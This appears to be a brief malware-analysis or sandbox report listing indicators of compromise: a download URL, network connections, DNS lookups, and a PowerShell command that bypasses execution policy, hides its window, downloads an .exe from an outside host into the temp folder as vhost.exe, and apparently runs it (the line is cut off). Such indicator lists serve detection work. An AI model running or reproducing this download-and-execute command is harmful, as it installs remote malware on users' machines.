Technical Information
- https://u.teknik.io/roumb.exe as %temp + %\vhost.exe
- 'u.##knik.io':443
- 'x1.#.lencr.org':80
- http://x1.#.lencr.org/
- DNS ASK u.##knik.io
- DNS ASK x1.#.lencr.org
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -executionpolicy bypass -WindowStyle Hidden -noprofile -noexit (New-Object System.Net.WebClient).DownloadFile('https://u.teknik.io/roUMb.exe', $env:TEMP + '\vhost.exe'); (New-Object -com Shell....' (with hidden window)